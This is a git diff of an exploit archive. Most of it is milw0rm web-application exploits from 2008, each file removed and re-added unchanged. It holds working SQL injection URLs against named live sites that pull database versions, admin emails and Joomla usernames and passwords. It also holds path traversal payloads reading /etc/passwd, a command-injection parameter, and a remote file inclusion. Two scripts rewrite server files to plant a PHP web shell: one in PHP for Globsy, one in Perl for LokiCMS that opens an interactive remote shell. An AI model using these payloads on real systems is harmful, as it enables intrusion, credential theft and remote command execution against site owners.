@@ -1,25 +1,25 @@ -####################################################### -# Author : BeyazKurt -# Contact : BeyazKurt@BSDMail.Com -# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP -# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! -# -# Script : Easynet4u Link Host -# Script Site: http://www.easynet4u.com/linkdem.php -# -# SQL Injection Vuln. : -# Exploit : SITE.COM/[path]/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/* -# -# Example: -# http://www.easynet4u.com/homebusiness/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/* -# -# ------------------------------- -# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) -# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! -# Proud 2 Be MUSLIM ! -# Proud 2 Be ALBANIAN ! -# -# Bunuda yayinlamassn ebeni ... -####################################################### - -# milw0rm.com [2008-10-10] +####################################################### +# Author : BeyazKurt +# Contact : BeyazKurt@BSDMail.Com +# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP +# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE! +# +# Script : Easynet4u Link Host +# Script Site: http://www.easynet4u.com/linkdem.php +# +# SQL Injection Vuln. : +# Exploit : SITE.COM/[path]/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/* +# +# Example: +# http://www.easynet4u.com/homebusiness/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/* +# +# ------------------------------- +# INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H) +# pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !! +# Proud 2 Be MUSLIM ! +# Proud 2 Be ALBANIAN ! +# +# Bunuda yayinlamassn ebeni ... +####################################################### + +# milw0rm.com [2008-10-10] 
diff --git a/platforms/php/webapps/6729.php b/platforms/php/webapps/6729.php index 947344296..005e270f7 100755 --- a/platforms/php/webapps/6729.php +++ b/platforms/php/webapps/6729.php @@ -1,61 +1,61 @@ -#!/usr/bin/php -q - - -# milw0rm.com [2008-10-10] +#!/usr/bin/php -q + + +# milw0rm.com [2008-10-10] diff --git a/platforms/php/webapps/6730.txt b/platforms/php/webapps/6730.txt index 745eed4df..6d24bb07e 100755 --- a/platforms/php/webapps/6730.txt +++ b/platforms/php/webapps/6730.txt 
@@ -1,39 +1,39 @@ -############################################################################# -# # -# Joomla Component Ownbiblio SQL Injection Vulnerability # -# # -############################################################################# - - -######################################## - -[~] Vulnerability found by: H!tm@N -[~] Contact: hitman[at]khg-crew[dot]ws -[~] Site: www.khg-crew.ws -[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] - -######################################## - -[~] ScriptName: "Joomla" -[~] Component: "Ownbiblio (com_ownbiblio)" -[~] Version: "1.5.3" -[~] Author: "Sebastian Kruvinnus, Michael Kehrwecker" - -######################################## - -[~] DORK: inurl:"com_ownbiblio" catalogue - -######################################## - -[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL] -[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- - -######################################## - -[~] Proud 2 be Albanian -[~] Proud 2 be Muslim -[~] United States of Albania - -######################################## - -# milw0rm.com [2008-10-11] +############################################################################# +# # +# Joomla Component Ownbiblio SQL Injection Vulnerability # +# # +############################################################################# + + +######################################## + +[~] Vulnerability found by: H!tm@N +[~] Contact: hitman[at]khg-crew[dot]ws +[~] Site: www.khg-crew.ws +[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] + +######################################## + +[~] ScriptName: "Joomla" +[~] Component: "Ownbiblio (com_ownbiblio)" +[~] Version: "1.5.3" +[~] Author: "Sebastian Kruvinnus, Michael Kehrwecker" + +######################################## + +[~] DORK: 
inurl:"com_ownbiblio" catalogue + +######################################## + +[~] Exploit: /index.php?option=com_ownbiblio&view=catalogue&catid=[SQL] +[~] Example: /index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- + +######################################## + +[~] Proud 2 be Albanian +[~] Proud 2 be Muslim +[~] United States of Albania + +######################################## + +# milw0rm.com [2008-10-11] diff --git a/platforms/php/webapps/6733.txt b/platforms/php/webapps/6733.txt index 7213168d8..c3bf84ea9 100755 --- a/platforms/php/webapps/6733.txt +++ b/platforms/php/webapps/6733.txt @@ -1,18 +1,18 @@ -mini-pub 0.3 multiple vulnerabilities - -download http://sourceforge.net/projects/mini-pub/ - -author muuratsalo -contact muuratsalo[at]gmail.com - -exploits -1. local file disclosure -http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt? - -2. local file disclosure -http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd - -3. command execution -http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv - -# milw0rm.com [2008-10-12] +mini-pub 0.3 multiple vulnerabilities + +download http://sourceforge.net/projects/mini-pub/ + +author muuratsalo +contact muuratsalo[at]gmail.com + +exploits +1. local file disclosure +http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt? + +2. local file disclosure +http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd + +3. command execution +http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv + +# milw0rm.com [2008-10-12] diff --git a/platforms/php/webapps/6734.txt b/platforms/php/webapps/6734.txt index a904d6381..4c3c9b037 100755 --- a/platforms/php/webapps/6734.txt +++ b/platforms/php/webapps/6734.txt 
@@ -1,22 +1,22 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - - -mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities -Script : http://mini-pub.sourceforge.net/ -I- Local Directory Traversal -POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL - -II- File Disclosure -POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-10-12] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + + +mini-pub.php <= v0.3 Local Directory Traversal / File Disclosure Vulnerabilities +Script : http://mini-pub.sourceforge.net/ +I- Local Directory Traversal +POC : /mini-pub.php-0.3/front-end/dir.php?sDir=C:\AppServ\MySQL + +II- File Disclosure +POC : /mini-pub.php-0.3/front-end/edit.php?sFileName=edit.php + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + | | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-10-12] diff --git a/platforms/php/webapps/6735.php b/platforms/php/webapps/6735.php index d0b27dd43..817a0d284 100755 --- a/platforms/php/webapps/6735.php +++ b/platforms/php/webapps/6735.php 
@@ -1,102 +1,102 @@ -#!/usr/bin/php -q -'".$filename."' could not be opened."); -39. fwrite($handle, $data) or die("Write: The file '".$filename."' could not be writen."); - - $mode is $_POST['mode'] and $data = $_POST['data'] - - so you can rewrite (or create) any file - -*/ - - -error_reporting(0); -ini_set("default_socket_timeout",5); - -$host = str_replace('http:\/\/',null,$argv[1]); -$path = $argv[2]."/globsy_edit.php?file="; -$file = $argv[3]; -$exec = intval($argv[4]); - -if($exec == 8) -{ - $input = stripslashes(trim(fgets(STDIN))); -} -else -{ - $input = "Write your code\r\n"; -} - - -$array = array( - 'include($_GET["input"]);', - 'exec($_GET["input");', - 'eval($_GET["input");', - 'file_get_contents($_GET["input"]);', - 'phpinfo();', - 'system($_GET["input");', - 'shell_exec($_GET["input");', - 'echo $_GET["input");', - $input - ); - -if($argc != 5) -{ - echo "[?] Globsy <= 1.0 Remote File Rewriting Exploit\r\n"; - echo "[?] Usage: php $argv[0] [host] [path] [file] [option]\r\n\r\n"; - echo "[?] Options: \r\n"; - - for($i=0;$i<=count($array)-1;$i++) - { - echo "-$i $array[$i]\r\n"; - } - return exit; -} - -if(!$sock = fsockopen($host,80)) die("[?] Socket Error\r\n"); - -$path .= $file; -$post .= "mode=save&data="; -$data .= "POST /$path HTTP/1.1\r\n"; -$data .= "Host: $host\r\n"; -$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; -$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; -$data .= "Accept-Encoding: text/plain\r\n"; -$data .= "Content-Length: ".strlen($post)."\r\n"; -$data .= "Connection: close\r\n\r\n"; -$data .= $post; - -if(!fputs($sock,$data)) die("[?] Fputs Error!\n"); - -while(!feof($sock)) -{ - $content .= fgets($sock); -} fclose($sock); - -if(!strpos('File data saved OK',$content)) -{ - echo "[?] Exploit Successfully!\r\n"; - echo "[?] $array[$exec] written in $file\r\n"; -} -else -{ - echo "[?] 
Exploit Failed!\r\n"; - exit; -} - - -?> - -# milw0rm.com [2008-10-12] +#!/usr/bin/php -q +'".$filename."' could not be opened."); +39. fwrite($handle, $data) or die("Write: The file '".$filename."' could not be writen."); + + $mode is $_POST['mode'] and $data = $_POST['data'] + + so you can rewrite (or create) any file + +*/ + + +error_reporting(0); +ini_set("default_socket_timeout",5); + +$host = str_replace('http:\/\/',null,$argv[1]); +$path = $argv[2]."/globsy_edit.php?file="; +$file = $argv[3]; +$exec = intval($argv[4]); + +if($exec == 8) +{ + $input = stripslashes(trim(fgets(STDIN))); +} +else +{ + $input = "Write your code\r\n"; +} + + +$array = array( + 'include($_GET["input"]);', + 'exec($_GET["input");', + 'eval($_GET["input");', + 'file_get_contents($_GET["input"]);', + 'phpinfo();', + 'system($_GET["input");', + 'shell_exec($_GET["input");', + 'echo $_GET["input");', + $input + ); + +if($argc != 5) +{ + echo "[?] Globsy <= 1.0 Remote File Rewriting Exploit\r\n"; + echo "[?] Usage: php $argv[0] [host] [path] [file] [option]\r\n\r\n"; + echo "[?] Options: \r\n"; + + for($i=0;$i<=count($array)-1;$i++) + { + echo "-$i $array[$i]\r\n"; + } + return exit; +} + +if(!$sock = fsockopen($host,80)) die("[?] Socket Error\r\n"); + +$path .= $file; +$post .= "mode=save&data="; +$data .= "POST /$path HTTP/1.1\r\n"; +$data .= "Host: $host\r\n"; +$data .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n"; +$data .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$data .= "Accept-Encoding: text/plain\r\n"; +$data .= "Content-Length: ".strlen($post)."\r\n"; +$data .= "Connection: close\r\n\r\n"; +$data .= $post; + +if(!fputs($sock,$data)) die("[?] Fputs Error!\n"); + +while(!feof($sock)) +{ + $content .= fgets($sock); +} fclose($sock); + +if(!strpos('File data saved OK',$content)) +{ + echo "[?] Exploit Successfully!\r\n"; + echo "[?] $array[$exec] written in $file\r\n"; +} +else +{ + echo "[?] Exploit Failed!\r\n"; + exit; +} + + +?> + +# milw0rm.com [2008-10-12] 
diff --git a/platforms/php/webapps/6736.txt b/platforms/php/webapps/6736.txt index 749aff565..ce53ff134 100755 --- a/platforms/php/webapps/6736.txt +++ b/platforms/php/webapps/6736.txt 
@@ -1,29 +1,29 @@ -############################################################################################### -# Author : EgY Coders TM < Hakxer> -# Home : Www.educ-up.com -# Type Gap : SQL INJECTION -# script : Real-Estate-Scripts [see script] http://www.real-estate-scripts.com/demo.html -# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk -################################################################################################# -####### [+] Bug in : index.php -### POC - http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+@@version,2,3/* - http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+user(),2,3/* -### Exploit - [+] Get User -# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+admin_email,2,3+from+ovi_anuntgratis.class_settings/* - [+] Get Database Name -# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+database(),2,3/* - -# [+] HaVe Fun .. ; - - -############################################################################### - --------------------------------- The End of Gap ----------------------------------- - -## Contact : aq5@windowslive.com -### Muslim Hacker .. 
I love you Mohammed Rasull Allah -###################################################### - -# milw0rm.com [2008-10-12] +############################################################################################### +# Author : EgY Coders TM < Hakxer> +# Home : Www.educ-up.com +# Type Gap : SQL INJECTION +# script : Real-Estate-Scripts [see script] http://www.real-estate-scripts.com/demo.html +# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 ,Bright D@rk +################################################################################################# +####### [+] Bug in : index.php +### POC + http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+@@version,2,3/* + http://www.site.com/real-estate/index.php?cat=-5+UNION+SELECT+user(),2,3/* +### Exploit + [+] Get User +# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+admin_email,2,3+from+ovi_anuntgratis.class_settings/* + [+] Get Database Name +# [+] http://www.real-estate-scripts.com/real-estate/index.php?cat=-5+UNION+SELECT+database(),2,3/* + +# [+] HaVe Fun .. ; + + +############################################################################### + +-------------------------------- The End of Gap ----------------------------------- + +## Contact : aq5@windowslive.com +### Muslim Hacker .. I love you Mohammed Rasull Allah +###################################################### + +# milw0rm.com [2008-10-12] diff --git a/platforms/php/webapps/6737.txt b/platforms/php/webapps/6737.txt index ed045f441..1051dd83a 100755 --- a/platforms/php/webapps/6737.txt +++ b/platforms/php/webapps/6737.txt 
@@ -1,120 +1,120 @@ -# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit -# url: http://www.lokicms.com/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. -# -# Greetz To: All Hackers and milw0rm website - -vulnerability: -The vulnerability allows to verify the existence of the files and directories around the server. -/etc/passwd (example) - -vuln file: index.php -vuln code: ------------------------------------------------- -if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) ); - - - -// load the page - -if ($pagename == '') { - - $name = $c_default; - - $nosimple = true; - -} else { - - $name = $pagename; - -}; - - - -if ($c_simplelink == true && $nosimple != true) { - - $content = findpage($name); - - if ($content == "") {$content = $c_default;}; - -} else { - - $content = $name; - -}; - - - -// stupid fix due to subdomain problems - -if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . 
$content) == false) {$content = $c_default;};}; - - - -// load the menu - -$menu = getmenu($content, $c_modrewrite, $c_simplelink); - - - -$content = parsepage($content); ------------------------------------------------- - -use strict; -use LWP::UserAgent; - -sub lw -{ - -my $SO = $^O; -my $linux = ""; -if (index(lc($SO),"win")!=-1){ - $linux="0"; - }else{ - $linux="1"; - } - if($linux){ -system("clear"); -} -else{ -system("cls"); -} - -} - -&lw; - -print "#################################################################\n"; -print "# LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit #\n"; -print "#################################################################\n"; - -my $victim = $ARGV[0]; -my $file = $ARGV[1]; - - if((!$ARGV[0]) && (!$ARGV[1])) { - print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n"; - print "[x] written by JosS - sys-project[at]hotmail.com\n"; - print "[x] usage: perl xpl.pl [host] [file]\n"; - print "[x] example: http://localhost/loki/ /includes/Config.php\n\n"; - exit(1); - } - - print "\n[+] connecting: $victim\n"; - my $cnx = LWP::UserAgent->new() or die; - my $go=$cnx->get($victim."index.php?page=../$file"); - if ($go->content =~ m/LokiCMS/ms) { - print "[-] The file not exist\n\n"; - } else { - print "[!] The file exist: $file\n\n"; - } - -# live demo: http://demo.opensourcecms.com/lokicms/ - -# milw0rm.com [2008-10-12] +# LokiCMS <= 0.3.4 (index.php page) Arbitrary Check File Exploit +# url: http://www.lokicms.com/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. +# +# Greetz To: All Hackers and milw0rm website + +vulnerability: +The vulnerability allows to verify the existence of the files and directories around the server. 
+/etc/passwd (example) + +vuln file: index.php +vuln code: +------------------------------------------------ +if ( isset ( $_GET ) && isset ( $_GET['page'] ) ) $pagename = stripslashes ( trim ( $_GET['page'] ) ); + + + +// load the page + +if ($pagename == '') { + + $name = $c_default; + + $nosimple = true; + +} else { + + $name = $pagename; + +}; + + + +if ($c_simplelink == true && $nosimple != true) { + + $content = findpage($name); + + if ($content == "") {$content = $c_default;}; + +} else { + + $content = $name; + +}; + + + +// stupid fix due to subdomain problems + +if ($c_modrewrite != true && $pagename != '') {if (file_exists(PATH . "/pages/" . $content) == false) {$content = $c_default;};}; + + + +// load the menu + +$menu = getmenu($content, $c_modrewrite, $c_simplelink); + + + +$content = parsepage($content); +------------------------------------------------ + +use strict; +use LWP::UserAgent; + +sub lw +{ + +my $SO = $^O; +my $linux = ""; +if (index(lc($SO),"win")!=-1){ + $linux="0"; + }else{ + $linux="1"; + } + if($linux){ +system("clear"); +} +else{ +system("cls"); +} + +} + +&lw; + +print "#################################################################\n"; +print "# LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit #\n"; +print "#################################################################\n"; + +my $victim = $ARGV[0]; +my $file = $ARGV[1]; + + if((!$ARGV[0]) && (!$ARGV[1])) { + print "\n[x] LokiCMS 0.3.4 (index.php page) Arbitrary Check File Exploit\n"; + print "[x] written by JosS - sys-project[at]hotmail.com\n"; + print "[x] usage: perl xpl.pl [host] [file]\n"; + print "[x] example: http://localhost/loki/ /includes/Config.php\n\n"; + exit(1); + } + + print "\n[+] connecting: $victim\n"; + my $cnx = LWP::UserAgent->new() or die; + my $go=$cnx->get($victim."index.php?page=../$file"); + if ($go->content =~ m/LokiCMS/ms) { + print "[-] The file not exist\n\n"; + } else { + print "[!] 
The file exist: $file\n\n"; + } + +# live demo: http://demo.opensourcecms.com/lokicms/ + +# milw0rm.com [2008-10-12] diff --git a/platforms/php/webapps/6739.txt b/platforms/php/webapps/6739.txt index 352b75816..e058a8201 100755 --- a/platforms/php/webapps/6739.txt +++ b/platforms/php/webapps/6739.txt 
@@ -1,56 +1,56 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -$ Program: NewLife Blogger -$ Version: <= 3.0 -$ File affected: system/nlb_user.class.php -$ Download: http://sourceforge.net/projects/nlb/ - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - - -Cookie format is: -nlb3=7::96e79218965eb72c92a549dd5a330112 -nlb3=iduser::md5 pass - ---Bug -- - -143. function checkLogin( ) { -144. // loing check -145. if( isset( $_COOKIE['nlb3'] ) ) { -146. $data = explode( '::', $_COOKIE['nlb3'] ); -147. $id = $data[0]; -148. $pass = $data[1]; -149. $fromdb = $this->sql->getArray('SELECT password FROM ' . db_users . ' WHERE user_id = ' . $id . ' LIMIT 1;'); -150. if( $pass === $fromdb['password'] ) { -151. $this->setid( $id ); -152. $this->isLogedIn = true; -153. } else { -154. $this->isLogedIn = false; -155. } -156. } -157. // we also check for banned users -158. $this->checkBanned(); -159. } - - --- Exploit -- - -True/false method to blind mysql injection. 
Examples: - -javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112" -Response: You appears as logged in - -javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112" -Response: You appears as not logged in - -javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112 -Response: You appears as logged in if MySQL version is 4 - -javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112 -Response: You appears as logged in if MySQL version is 5 - -# milw0rm.com [2008-10-12] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= +NewLife Blogger <= v3.0 / Insecure Cookie Handling & SQL Injection Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +$ Program: NewLife Blogger +$ Version: <= 3.0 +$ File affected: system/nlb_user.class.php +$ Download: http://sourceforge.net/projects/nlb/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + + +Cookie format is: +nlb3=7::96e79218965eb72c92a549dd5a330112 +nlb3=iduser::md5 pass + +--Bug -- + +143. function checkLogin( ) { +144. // loing check +145. if( isset( $_COOKIE['nlb3'] ) ) { +146. $data = explode( '::', $_COOKIE['nlb3'] ); +147. $id = $data[0]; +148. $pass = $data[1]; +149. $fromdb = $this->sql->getArray('SELECT password FROM ' . db_users . ' WHERE user_id = ' . $id . ' LIMIT 1;'); +150. if( $pass === $fromdb['password'] ) { +151. $this->setid( $id ); +152. $this->isLogedIn = true; +153. } else { +154. $this->isLogedIn = false; +155. } +156. } +157. // we also check for banned users +158. $this->checkBanned(); +159. } + + +-- Exploit -- + +True/false method to blind mysql injection. 
Examples: + +javascript:document.cookie = "nlb3=7 and 1=1::96e79218965eb72c92a549dd5a330112" +Response: You appears as logged in + +javascript:document.cookie = "nlb3=7 and 1=0::96e79218965eb72c92a549dd5a330112" +Response: You appears as not logged in + +javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=4::96e79218965eb72c92a549dd5a330112 +Response: You appears as logged in if MySQL version is 4 + +javascript:document.cookie = "nlb3=7 and (select substring(version(),1,1))=5::96e79218965eb72c92a549dd5a330112 +Response: You appears as logged in if MySQL version is 5 + +# milw0rm.com [2008-10-12] diff --git a/platforms/php/webapps/6740.txt b/platforms/php/webapps/6740.txt index 9d4f2829e..cbcc74427 100755 --- a/platforms/php/webapps/6740.txt +++ b/platforms/php/webapps/6740.txt 
@@ -1,31 +1,31 @@ -# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability -# url: http://sourceforge.net/projects/myphpindexer/ -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - ------------------------------------------------ -Depending the server configuration is possible -that it doesn't allow us to scale directories. ------------------------------------------------ - -vuln file: index.php - -PoC: /index.php?d=[DIR]&f=[FILE] -Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd - /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd - -live demo: -[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f) -[FILE] = index.php; -http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php - -dork: "Powered by My PHP Indexer 1.0" -dork (2): "priv8 :P" - -# milw0rm.com [2008-10-12] +# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability +# url: http://sourceforge.net/projects/myphpindexer/ +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +----------------------------------------------- +Depending the server configuration is possible +that it doesn't allow us to scale directories. 
+----------------------------------------------- + +vuln file: index.php + +PoC: /index.php?d=[DIR]&f=[FILE] +Exploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd + /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd + +live demo: +[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f) +[FILE] = index.php; +http://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php + +dork: "Powered by My PHP Indexer 1.0" +dork (2): "priv8 :P" + +# milw0rm.com [2008-10-12] diff --git a/platforms/php/webapps/6743.pl b/platforms/php/webapps/6743.pl index 3aa0a07bf..7fa8cacfc 100755 --- a/platforms/php/webapps/6743.pl +++ b/platforms/php/webapps/6743.pl 
@@ -1,73 +1,73 @@ -# Author: __GiReX__ -# Homepage: http://girex.altervista.org - -# CMS: LokiCMS 0.3.4 -# URL: http://www.lokicms.com/ - -# Description: LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408) -# The exploit changed becouse the vars changed but the bugged function is the same: writeconfig() -# LokiCMS does not check the access to admin.php via POST... - -#!/usr/bin/perl -w -# LokiCMS <= 0.3.4 Remote Command Execution Exploit -# Needs with magic_quotes_gpc = Off -# Coded by __GiReX__ - -use LWP::UserAgent; - -if(not defined $ARGV[0]) -{ - banner(); - print "[-] Usage: perl $0 [host] [path]\n"; - print "[-] Example: perl $0 localhost /lokicms/\n\n"; - exit; -} - -my $lwp = new LWP::UserAgent or die; - -my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; - $target .= $ARGV[1] unless not defined $ARGV[1]; - $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; - -banner(); -my $res = $lwp->post($target.'admin.php', - [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', - 'title' => "';echo \"\";if(strlen(\$_SERVER['HTTP_CMD']))". - "passthru(\$_SERVER['HTTP_CMD']);//", - 'language' => 'english-utf-8', - 'theme' => 'default' ]); - -if($res->is_error) -{ - print "[-] Request mistake. Exploit terminated!\n"; - exit (); -} - -while(1) -{ - print "[+] shell:~\$ "; - chomp($cmd = ); - last if $cmd eq 'exit'; - - $lwp->default_header( 'CMD' => $cmd ); - my $res = $lwp->get($target.'includes/Config.php'); - - if($res->is_success and $res->content =~ /INFECTED/) - { - print "\n". substr($res->content, index($res->content, 'INFECTED') + 12)."\n"; - } - else - { - print "[-] PHP Code not injected. 
maybe magic_quotes_gpc = On!\n"; - last; - } -} - -sub banner -{ - print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit\n"; - print "[+] Coded by __GiReX__\n"; - print "\n"; -} - -# milw0rm.com [2008-10-13] +# Author: __GiReX__ +# Homepage: http://girex.altervista.org + +# CMS: LokiCMS 0.3.4 +# URL: http://www.lokicms.com/ + +# Description: LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408) +# The exploit changed becouse the vars changed but the bugged function is the same: writeconfig() +# LokiCMS does not check the access to admin.php via POST... + +#!/usr/bin/perl -w +# LokiCMS <= 0.3.4 Remote Command Execution Exploit +# Needs with magic_quotes_gpc = Off +# Coded by __GiReX__ + +use LWP::UserAgent; + +if(not defined $ARGV[0]) +{ + banner(); + print "[-] Usage: perl $0 [host] [path]\n"; + print "[-] Example: perl $0 localhost /lokicms/\n\n"; + exit; +} + +my $lwp = new LWP::UserAgent or die; + +my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; + $target .= $ARGV[1] unless not defined $ARGV[1]; + $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; + +banner(); +my $res = $lwp->post($target.'admin.php', + [ 'LokiACTION' => 'A_SAVE_G_SETTINGS', + 'title' => "';echo \"\";if(strlen(\$_SERVER['HTTP_CMD']))". + "passthru(\$_SERVER['HTTP_CMD']);//", + 'language' => 'english-utf-8', + 'theme' => 'default' ]); + +if($res->is_error) +{ + print "[-] Request mistake. Exploit terminated!\n"; + exit (); +} + +while(1) +{ + print "[+] shell:~\$ "; + chomp($cmd = ); + last if $cmd eq 'exit'; + + $lwp->default_header( 'CMD' => $cmd ); + my $res = $lwp->get($target.'includes/Config.php'); + + if($res->is_success and $res->content =~ /INFECTED/) + { + print "\n". substr($res->content, index($res->content, 'INFECTED') + 12)."\n"; + } + else + { + print "[-] PHP Code not injected. 
maybe magic_quotes_gpc = On!\n"; + last; + } +} + +sub banner +{ + print "[+] LokiCMS 0.3.4 Remote Command Execution Exploit\n"; + print "[+] Coded by __GiReX__\n"; + print "\n"; +} + +# milw0rm.com [2008-10-13] diff --git a/platforms/php/webapps/6744.txt b/platforms/php/webapps/6744.txt index 266acc946..e393d98b9 100755 --- a/platforms/php/webapps/6744.txt +++ b/platforms/php/webapps/6744.txt 
